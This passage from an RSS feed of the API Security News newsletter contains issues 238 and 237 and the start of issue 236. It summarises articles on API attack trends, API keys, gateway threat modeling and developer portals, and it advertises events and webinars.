<p>The post <a href="https://apisecurity.io/issues-239-hugging-face-api-token-breach-sonicwall-firewalls-exploit-kubernetes-api-gateway-guide/">Issue 239: Hugging Face API token breach, SonicWall firewalls exploit, Kubernetes API gateway guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 238: APIs used to target business, cloud-native for APIs, and APIs becoming attractive targets</title>
		<link>https://apisecurity.io/issues-238-apis-used-to-target-business-cloud-native-for-apis-apis-becoming-attractive-targets/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 25 Jan 2024 16:59:40 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11033</guid>

					<description><![CDATA[<p>This week, we have views from Forbes on how APIs are being used to target businesses and articles on the role of cloud-native for APIs and how APIs are becoming attractive targets. We also have a doubleheader from Dana Epp covering his predictions for 2024 and structured format injection attacks. We also have news of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issues-238-apis-used-to-target-business-cloud-native-for-apis-apis-becoming-attractive-targets/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issues-238-apis-used-to-target-business-cloud-native-for-apis-apis-becoming-attractive-targets/">Issue 238: APIs used to target business, cloud-native for APIs, and APIs becoming attractive targets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, </span><span style="font-weight: 400;">we have views from Forbes on how APIs are being used to target businesses and articles on the role of cloud-native for APIs and how APIs are becoming attractive targets. We also have a doubleheader from Dana Epp covering his predictions for 2024 and structured format injection attacks. We also have news of upcoming events from 42Crunch.</span></p>
<h2><span style="font-weight: 400;">Article: Attackers are using APIs to target your business</span></h2>
<p style="font-weight: 400;"><a href="https://www.forbes.com/sites/forbestechcouncil/2024/01/08/how-attackers-are-using-apis-to-target-your-business/?sh=4a87f5db4e1b" target="_blank" rel="noopener"><span style="font-weight: 400;">his week&#8217;s first article is Forbes coverage </span></a><span style="font-weight: 400;">on how attackers are using APIs to target businesses. The article cites the findings of the US Securities and Exchange Commission (SEC) into a major breach at a US telecommunications company where the PII of over 37 million user accounts was leaked in a breach. The root cause was found to be an attacker using an API to exfiltrate the data from their systems. The article also reminds us of the accuracy of the 2023 Gartner prediction, forecasting that APIs would become the top attack vector for cybercriminals. Despite improvements made with endpoint and identity security solutions, criminals increasingly find APIs offering an initial foothold. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Forbes analysis echoes my predictions for API security in 2024. Firstly, key theft (or key leakage) will become the top attack vector attackers use. Secondly, organizations will face challenges in determining the extent of data breaches when they occur. Customers will increasingly turn to third-party monitoring services to identify when their data has been leaked.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article concludes with the recommendation that organizations pay careful attention to the security of their API keys, monitor the dark web for leakage, and then revoke and reissue compromised keys before they can be used in attacks.</span></p>
<h2><span style="font-weight: 400;">Article: The role of cloud-native for APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Next, </span><a href="https://nordicapis.com/exploring-the-role-of-cloud-native-in-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have some top market research</span></a><span style="font-weight: 400;"> from Bill Doerrfeld over at NordicAPIs on the role of cloud-native in APIs. The article focuses on how the continued adoption of both API-first strategies and cloud-native architectures is changing the face of API management solutions. Bill’s research comes from interviews with various industry leaders at KubeCon 2023.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Most experts agree that we are moving from a model for standalone API gateways or management portals (such as the very popular NGINX) toward an architecture where the API management is incorporated directly into the Kubernetes fabric and controlled and configured as part of the deployment. Kong is cited as a product that originated as a standalone product to a solution that can be deployed directly in Kubernetes as an ingress controller. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Idit Levine (founder and CEO of Solo.io) suggests that the main drivers towards this tighter integration are the need for greater ease of use and responsiveness to changing needs and requirements. Using technologies such as Envoy Proxy makes them much easier to combine with containerized deployments. Dave Sudia (director of Developer Relations at Ambassador Labs) suggests that the main drivers are enablement and speed, using the rise of GitOps as a modern way of operating where infrastructure can be deployed via code. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Service mesh continues to promise a lot in terms of tightly coupled API security, but the experts suggest this will mainly dominate for east-west traffic (internal between services) rather than north-south, where the API management portals and gateways will still play a crucial role. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The topic of how API management, cloud-native, and backstage intersect raised some interesting points. Most importantly, how are they to be managed? As API adoption and rollout grows, organizations will need catalogs or so-called API portals. Opinion is divided but the general consensus is that GUI-based management portals will always be necessary and are unlikely ever to be replaced by a GitOps approach. Levine suggested that platforms such as Backstage can be integrated with cloud-native tools such as Solo.io to provide this capability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, Bill covers the GA release of the Kubernetes Gateway API, which provides an interface for networking in Kubernetes and controls HTTP routing into clusters. While many cloud-native providers have already written integrations into Kubernetes, this new API provides a standardized way of controlling ingress traffic and routing.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"> Thanks to Bill for this great research into a rapidly changing space. </span></p>
<h2><span style="font-weight: 400;">Article: APIs are becoming attractive targets</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Helpnet Security covers how APIs are becoming attractive targets for attackers in </span><a href="https://www.helpnetsecurity.com/2024/01/11/apis-attack-volume-rise/" target="_blank" rel="noopener"><span style="font-weight: 400;">the next article this week</span></a><span style="font-weight: 400;">. Quoting Matthew Prince (CEO of Cloudflare), APIs offer a </span><i><span style="font-weight: 400;">“rich, and relatively new, target for hackers.”</span></i><span style="font-weight: 400;">  The article quotes some familiar statistics, such as the dominance of API traffic globally (57% according to Cloudflare), with the highest occurrence in 2023 in Africa and Asia. Correspondingly, there has been a marked increase in attack volume with HTTP anomaly, injection attacks, and file inclusion being the top three attacks seen by Cloudflare.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Machine learning is used to discover more API REST endpoints than customer-provided identifiers (such as catalogs or inventories), and 33% of mitigations applied to API threats were blocked by DDoS protections already in place.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In conclusion, the article emphasizes the importance of greater visibility of APIs and careful attention to using secure authentication and authorization techniques.</span></p>
<h2><span style="font-weight: 400;">Article: Exploiting an API with structured format injection</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">That man Dana Epp is back; this time, </span><a href="https://danaepp.com/structured-format-injection" target="_blank" rel="noopener"><span style="font-weight: 400;">he’s discussing how to attack APIs</span></a><span style="font-weight: 400;"> using structured format injection. For decades, web developers have been taught not to trust user input, and whilst that message has begun to resonate, APIs present a new vector for abusing input data. APIs, with their structured data inputs, provide great opportunities for wily attackers to abuse the input data to produce unexpected outcomes in the API backend. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Dana’s article describes various approaches to tainting input data in JSON and YAML payloads, including how to manipulate parameters to trigger a </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">Broken Object Property Level Authorization</span></a><span style="font-weight: 400;"> (formerly known as Mass Assignment) vulnerability. As Dana concludes: </span><i><span style="font-weight: 400;">“try to taint all the things”</span></i></p>
<h2><span style="font-weight: 400;">Article: Dana Epp’s predictions for 2024</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Coming to the game slightly late (but still in January), </span><a href="https://danaepp.com/api-security-in-2024" target="_blank" rel="noopener"><span style="font-weight: 400;">let us look at Dana’s predictions</span></a><span style="font-weight: 400;"> for API security in 2024. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In no particular order, here are Dana’s predictions:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Automated attacks against APIs will continue.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">“Secrets Sprawl” will still be a thing – personally, this is likely to be the biggest issue in 2024.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">AuthN and AuthZ issues will still exist – almost certainly.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Generative AI will be leveraged to attack APIs.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Security tools still won’t catch critical vulnerabilities.</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Come for the predictions, and stay for the memes – thanks Dana for a fun read <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11035" src="https://apisecurity.io/wp-content/uploads/2024/01/Generative-API-258x300.jpg" alt="" width="301" height="350" srcset="https://apisecurity.io/wp-content/uploads/2024/01/Generative-API-258x300.jpg 258w, https://apisecurity.io/wp-content/uploads/2024/01/Generative-API.jpg 440w" sizes="auto, (max-width: 301px) 100vw, 301px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">On the topic of predictions, the </span><a href="https://matthewreinbold.github.io/APIFutures/" target="_blank" rel="noopener"><span style="font-weight: 400;">API Futures</span></a><span style="font-weight: 400;"> project from Matthew Reinbold makes for some fantastic reading and is highly recommended to anyone working with APIs.</span></p>
<h2><span style="font-weight: 400;">Event: 42Crunch at API Summit in Austin</span></h2>
<p><a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11029" src="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png" alt="" width="499" height="143" srcset="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png 300w, https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2.png 700w" sizes="auto, (max-width: 499px) 100vw, 499px" /></a></p>
<p>The <a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw12vpv9dojHI5CW_cd9xWda">Austin API Summit 2024</a> is approaching fast! Don&#8217;t miss your chance to join us on March 12-13th in Austin, TX &#8211; to meet industry colleagues, get inspired, and gather knowledge about the technology, trends and best practices shaping today’s API economy.</p>
<p>The event includes a <a href="https://nordicapis.com/events/austin-api-summit-2024/#speakers" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/%23speakers&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw3ffHErpNbkRocCokytsfxB">fantastic lineup of speakers</a> who will discuss many different aspects and best practices of API design, security, documentation, management, and more.</p>
<h2><span style="font-weight: 400;">Webinar: Top Things You Need to Know About API Security</span></h2>
<p><a href="https://42crunch.com/webinar-top-things-you-need-to-know-about-api-security/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11020" src="https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-300x172.png" alt="" width="405" height="232" srcset="https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-300x172.png 300w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-1024x585.png 1024w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-768x439.png 768w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024-1536x878.png 1536w, https://apisecurity.io/wp-content/uploads/2023/12/Top-things-you-need-to-know-about-API-Security-Webinar-2024.png 1784w" sizes="auto, (max-width: 405px) 100vw, 405px" /></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Uncertain about the differences between BOLA, BFLA and BOPLA?  Want to know how to protect your APIs against these and other key threats? Then <a href="https://42crunch.com/webinar-top-things-you-need-to-know-about-api-security/" target="_blank" rel="noopener">join our webinar</a> as two of the industry’s leading experts, Philippe De Ryck and Isabelle Mauny, guide you through some real-world cases of API security attacks and also share some best practices for securing your APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">They dive into crucial vulnerabilities highlighted in the OWASP API Security Top 10, such as enforcing authorization, protecting authentication endpoints and preventing SSRF, a new entry in the 2023 version of the OWASP Top10 for APIs. They also bring the threats to life with several demos, providing a practical look at how these vulnerabilities can be exploited, but also how they can be prevented through a combination of design-time and run-time protection.</span></p>
<p><span style="font-weight: 400;">At the end of this session, you will have an actionable set of guidelines to assess and improve the security of your own APIs in the face of a number of identified threats.</span></p>
<p>The post <a href="https://apisecurity.io/issues-238-apis-used-to-target-business-cloud-native-for-apis-apis-becoming-attractive-targets/">Issue 238: APIs used to target business, cloud-native for APIs, and APIs becoming attractive targets</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 237: Six API trends for 2024, API keys leading to vulnerabilities, the future of API gateways</title>
		<link>https://apisecurity.io/issues-237-six-api-trends-for-2024-api-keys-leading-to-vulnerabilities-the-future-of-api-gateways/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Jan 2024 17:54:26 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11028</guid>

					<description><![CDATA[<p>This week, we have a pair of doubleheaders — firstly, The New Stack on six API trends for 2024 and how API keys are leading to vulnerabilities, and then Kin Lane (aka. APIEvangelist) on the future of API gateways and why API discovery is hard. We also have an article on threat modeling for API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issues-237-six-api-trends-for-2024-api-keys-leading-to-vulnerabilities-the-future-of-api-gateways/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issues-237-six-api-trends-for-2024-api-keys-leading-to-vulnerabilities-the-future-of-api-gateways/">Issue 237: Six API trends for 2024, API keys leading to vulnerabilities, the future of API gateways</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we have a pair of doubleheaders — firstly, The New Stack on six API trends for 2024 and how API keys are leading to vulnerabilities, and then Kin Lane (aka. APIEvangelist) on the future of API gateways and why API discovery is hard. We also have an article on threat modeling for API gateways and news of 42Crunch at the API Summit in Austin.</span></p>
<h2><span style="font-weight: 400;">Article: Six API trends for 2024</span></h2>
<p><a href="https://thenewstack.io/6-api-trends-and-practices-to-know-for-2024/" target="_blank" rel="noopener"><span style="font-weight: 400;">The first article this week</span></a><span style="font-weight: 400;"> comes from The New Stack on their trends for APIs in 2024. API adoption and evolution continue to be a hot topic, and this article identifies some really interesting trends as the industry evolves, including, as expected, API security. </span></p>
<p><span style="font-weight: 400;">Here are the six trends:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>APIs from multiple sources:</b><span style="font-weight: 400;"> APIs have become a vital cog in the software supply chain, allowing connectivity between upstream providers and downstream consumers. Unfortunately, this provides an increased attack surface, as identified in the new OWASP API Security Top 10 </span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">API10:2023 Unsafe Consumption of APIs</span></a><span style="font-weight: 400;">.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Multiple API standards and formats:</b><span style="font-weight: 400;"> While REST is the dominant standard for APIs, newer protocols such as GraphQL and AsyncAPI tend to complicate the landscape further, mainly for security.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Unbundling API technology:</b><span style="font-weight: 400;"> Organizations have begun to find that their bundled solutions (such as APIMs and gateways) lack critical capabilities and have begun to unbundle in favor of more niche and bespoke solutions.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>API technology sprawl:</b><span style="font-weight: 400;"> API technology is rapidly evolving (think Kubernetes and FaaS), which poses challenges for governance and security.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;"><strong>API gateway evolution:</strong> The role of the traditional API gateway has changed, and nowadays, organizations are embedding lightweight gateways closer to their APIs. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Advanced API security:</b><span style="font-weight: 400;"> API security can no longer be handled solely at the gateway level, and organizations are faced with an array of security solutions, from shift-left developer-focused tools to the latest in machine learning solutions claiming to detect emerging threats. </span></li>
</ul>
<p><span style="font-weight: 400;">This is a very interesting read — for me, the comments on the evolution of the API gateways ring true, as do the observations on the API security landscape. </span></p>
<h2><span style="font-weight: 400;">Article: API keys leading to vulnerabilities </span></h2>
<p><span style="font-weight: 400;">The </span><a href="https://thenewstack.io/why-your-api-keys-are-leaving-you-vulnerable-to-attack/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article is again from The New Stack</span></a><span style="font-weight: 400;"> and discusses how API keys leave your APIs vulnerable to attack. The article suggests that despite the adoption of API gateways, APIs are still hamstrung by their reliance on API keys as the sole method of protection. </span></p>
<p><span style="font-weight: 400;">The first and most obvious problem with API keys is that they are frequently very long-lived, often with no expiration. The recent spate of leaked API keys presents a real risk to APIs protected only by keys. Remediation usually necessitates a revocation of keys and the generation of new keys, including the reconfiguration of clients. </span></p>
<p><span style="font-weight: 400;">The main issue with keys, according to the authors, is that keys do not offer fine-grained access control — if you have access to a key, you have access to everything in the API. They recommend using tokens (which contain embedded metadata, such as claims) to limit the token&#8217;s scope to specific subsections of the API or its data and the allowed operations. Tokens are usually issued using robust protocols such as OAuth2, adding greater resilience to their distribution and use. </span></p>
<p><span style="font-weight: 400;">So why doesn’t everyone use tokens, always? The fundamental reason is that they require significant investment in the design and development phase. When pushed with time pressure to deliver, many API teams will opt for a simple key-based solution rather than using a more robust token-based approach. </span></p>
<p><span style="font-weight: 400;">The article concludes with a case study of how the Curity identity server helps simplify the adoption of tokens. I particularly recommend Curity’s </span><a href="https://curity.io/resources/learn/the-api-security-maturity-model/" target="_blank" rel="noopener"><span style="font-weight: 400;">API Security Model</span></a><span style="font-weight: 400;"> for API architects and system designers — hopefully, we are all rapidly moving to Level 3. </span></p>
<h2><span style="font-weight: 400;">Article: The future of API gateways</span></h2>
<p><span style="font-weight: 400;">On the topic of API gateways, we have </span><a href="https://apievangelist.com/2023/11/12/where-is-this-api-gateway-thing-going/" target="_blank" rel="noopener"><span style="font-weight: 400;">a really great read</span></a><span style="font-weight: 400;"> from Kin Lane (aka. APIEvangelist) on the future of API gateways and where he sees the future taking us. As one would expect, given Kin’s pedigree in the API space, it is an exhaustive look at the history of API gateways, the current market and players, and predictions. </span></p>
<p><span style="font-weight: 400;">While the article is worth reading in its entirety, his view on the core capabilities is spot on, namely:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Security: </b><span style="font-weight: 400;">The majority of organizations are highly reliant on their API gateways for the security of their APIs, and increasingly, new players are leading with new security features. Kin suggests that security features will need to be standardized and hardened.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Traffic: </b><span style="font-weight: 400;">Traffic management is the other key role of the gateway, allowing organizations to manage access to their APIs and to allow them to scale gracefully. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Mediation:</b><span style="font-weight: 400;"> As the access point to the organization’s data, gateways are pivotal in managing who has access to what data.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Transformation:</b><span style="font-weight: 400;"> As the API protocol and payload landscape continues to expand, the gateways become more important in transforming data from one domain to the other in an efficient and scalable manner. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Virtualization:</b><span style="font-weight: 400;"> As the move to design-first accelerates, the API gateway will likely take on a greater role in providing mocking or virtualization capabilities.</span></li>
</ul>
<p><span style="font-weight: 400;">If you’re involved in selecting or buying an API gateway, the article has a great list of criteria and differentiators. Finally, in Kin’s own words:</span></p>
<blockquote class="blockquote"><p><i><span style="font-weight: 400;">“the API gateway of the future has to exist with a small federated footprint that is programmable and extensible. This gateway has to meet the needs of the product and engineering teams who depend on them, and like APIs, respond and evolve with whatever is happening next”</span></i></p></blockquote>
<h2><span style="font-weight: 400;">Article: Why API discovery is hard</span></h2>
<p><span style="font-weight: 400;">The </span><a href="https://apievangelist.com/2023/12/06/api-discovery-is-hard/" target="_blank" rel="noopener"><span style="font-weight: 400;">second article from Kin</span></a><span style="font-weight: 400;"> features his thoughts on why the perennial topic of API discovery is harder than one would necessarily expect. The lack of a known inventory is a top challenge for API security teams — you cannot secure what you do not know about. </span></p>
<p><span style="font-weight: 400;">Kin provides much context on the various dimensions of API discovery, including how to govern the API landscape. Along with security, having a known inventory is essential for adequate governance of APIs in a modern organization. This includes touch points such as:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Policies: </b><span style="font-weight: 400;">defining what policies already exist.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Regulation: </b><span style="font-weight: 400;">understanding the requirements of regulations such as GDPR.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Compliance: </b><span style="font-weight: 400;">ensuring that APIs are compliant.</span></li>
</ul>
<p><span style="font-weight: 400;">Thanks to Kin for two great contributions to the newsletter.</span></p>
<h2><span style="font-weight: 400;">Article: Threat modeling of API gateways</span></h2>
<p><span style="font-weight: 400;">API gateways are </span><a href="https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/threat-modeling-api-gateways-a-new-target-for-threat-actors" target="_blank" rel="noopener"><span style="font-weight: 400;">the focus of our last article</span></a><span style="font-weight: 400;">, this time in the form of a practical guide on how to threat-model an API gateway. As mentioned in previous articles in this newsletter, the API gateway is often the bastion of security for APIs and, as such, should be thoroughly threat-modeled to ensure there are no avoidable weaknesses. </span></p>
<p><span style="font-weight: 400;">From a security perspective, the API gateway provides the following functions: </span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Authorization and authentication</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Routing</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Offloading</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Transport Layer Security (TLS) termination</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Aggregation </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Single point of access</span></li>
</ul>
<p><span style="font-weight: 400;">The authors identify several common API security challenges and best practices as follows:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Inadequate rate limiting: APIs can easily be abused using brute force attack methods to deny access to the API or bypass login or password reset controls.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Insufficient data validation: APIs may be vulnerable to data injection attacks or disclose excessive data. Both of these can be prevented at the gateway level by packet inspection.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Insecure direct object references (BOLA): Gateways can be used to partially mitigate against the threats of BOLA by using pseudo identifiers.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Lack of logging and monitoring: Gateways are an excellent enforcement point for central logging and monitoring all API traffic. Most offer excellent integrations with common logging and monitoring platforms.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Lack of encryption: API gateways are an ideal point for enforcing TLS on all inbound connections.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Inadequate authentication and authorization: API gateways can perform authentication and authorization of inbound requests before they access internal APIs, ensuring the uniform enforcement of access control.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Misconfigured cross-origin resource sharing (CORS): APIs are able to enforce cross-origin resource sharing (CORS) at the gateway level, reducing the burden on individual APIs to implement this correctly.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Exposed sensitive data: As per the previous comment about data, gateways can protect against the leakage of sensitive data via an API response.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Lack of API versioning: Gateways can enforce versioning by routing APIs via path fragments and routing strategies. </span></li>
</ul>
<p><span style="font-weight: 400;">It is worth bookmarking this guide if you are involved in implementing API gateways.</span></p>
<h2><span style="font-weight: 400;">Event: 42Crunch at API Summit in Austin</span></h2>
<p><a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone  wp-image-11029" src="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png" alt="" width="499" height="143" srcset="https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2-300x86.png 300w, https://apisecurity.io/wp-content/uploads/2024/01/Nordic-APIs-Austin-API-Summit-700x200-2.png 700w" sizes="auto, (max-width: 499px) 100vw, 499px" /></a></p>
<p>The <a href="https://nordicapis.com/events/austin-api-summit-2024/" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw12vpv9dojHI5CW_cd9xWda">Austin API Summit 2024</a> is approaching fast! Don&#8217;t miss your chance to join us on March 12-13th in Austin, TX &#8211; to meet industry colleagues, get inspired, and gather knowledge about the technology, trends and best practices shaping today’s API economy.</p>
<p><strong id="m_3431677594419993224m_-9051751511418762167m_-1486403779972644088docs-internal-guid-0432ae74-7fff-374e-8ab9-8b3033d6242a">If you haven&#8217;t yet booked your Early Bird ticket, register by January 19th to get the best price!</strong></p>
<p>The event includes a <a href="https://nordicapis.com/events/austin-api-summit-2024/#speakers" target="_blank" rel="noopener" data-saferedirecturl="https://www.google.com/url?q=https://nordicapis.com/events/austin-api-summit-2024/%23speakers&amp;source=gmail&amp;ust=1704995213914000&amp;usg=AOvVaw3ffHErpNbkRocCokytsfxB">fantastic lineup of speakers</a> who will discuss many different aspects and best practices of API design, security, documentation, management, and more.</p>
<p>Also, Early Bird registrants will be the first to be offered discounted hotel rates available for the Austin API Summit delegates. So don’t wait to take advantage of the best price!</p>
<p>The post <a href="https://apisecurity.io/issues-237-six-api-trends-for-2024-api-keys-leading-to-vulnerabilities-the-future-of-api-gateways/">Issue 237: Six API trends for 2024, API keys leading to vulnerabilities, the future of API gateways</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 236: Using a developer portal, dark data in APIs, an update on Ray AI framework, predictions for 2024</title>
		<link>https://apisecurity.io/issues-236-using-a-developer-portal-dark-data-in-apis-update-ray-ai-framework-predictions-for-2024/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Dec 2023 18:19:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11019</guid>

					<description><![CDATA[<p>This week, we have an article on the value of using a developer portal for APIs, a guide from Dana Epp in finding “dark data” in an API, and an update from PortSwigger on their Web Security Academy resources for learning more about API security. We also have an update on the API vulnerabilities reported [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issues-236-using-a-developer-portal-dark-data-in-apis-update-ray-ai-framework-predictions-for-2024/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issues-236-using-a-developer-portal-dark-data-in-apis-update-ray-ai-framework-predictions-for-2024/">Issue 236: Using a developer portal, dark data in APIs, an update on Ray AI framework, predictions for 2024</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, </span><span style="font-weight: 400;">we have an article on the value of using a developer portal for APIs, a guide from Dana Epp in finding “dark data” in an API, and an update from PortSwigger on their Web Security Academy resources for learning more about API security. We also have an update on the API vulnerabilities reported in the Ray AI framework last week and news on the latest webinar from 42Crunch. Finally, as it is the season for such things, I make a few predictions for API security in 2024.</span></p>
<p><span style="font-weight: 400;">This is the final APISecurity.io newsletter for 2023. We wish all subscribers happy holidays and a prosperous New Year and look forward to welcoming you back with issue 237 on the 11th of January 2024!</span></p>
<h2><span style="font-weight: 400;">Article: Using a developer portal for APIs</span></h2>
<p><span style="font-weight: 400;">The first article this week </span><a href="https://thenewstack.io/using-a-developer-portal-for-api-management/" target="_blank" rel="noopener"><span style="font-weight: 400;">comes courtesy of The New Stack</span></a><span style="font-weight: 400;"> and covers the important topic of developer portals for APIs. A developer portal can be thought of as a library where you, your developers, and your customers can find and use your organization’s APIs. Without a developer portal, it can be challenging to keep track of your APIs, and this can lead to a duplication in effort as teams recreate existing APIs or a lack of control and governance over your API inventory. </span></p>
<p><span style="font-weight: 400;">From an API security perspective, most readers will be aware of the challenges an unmanaged inventory poses. Knowing your complete inventory is necessary to quantify the risk presented by your APIs. Many organizations typically have two or three times more APIs than they realize. By using a developer portal as an inventory tracking tool, security teams can keep track of their API assets, introduce governance over the introduction of new APIs, and gracefully manage the deprecation of obsolete APIs.</span></p>
<p><span style="font-weight: 400;">The author identifies several other benefits of API developer portals, namely: </span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Troubleshooting and maintenance:</b><span style="font-weight: 400;"> a comprehensive catalog can help developers and operations teams understand the connectivity of coupled APIs and aid in troubleshooting in the event of outages or performance issues.</span></li>
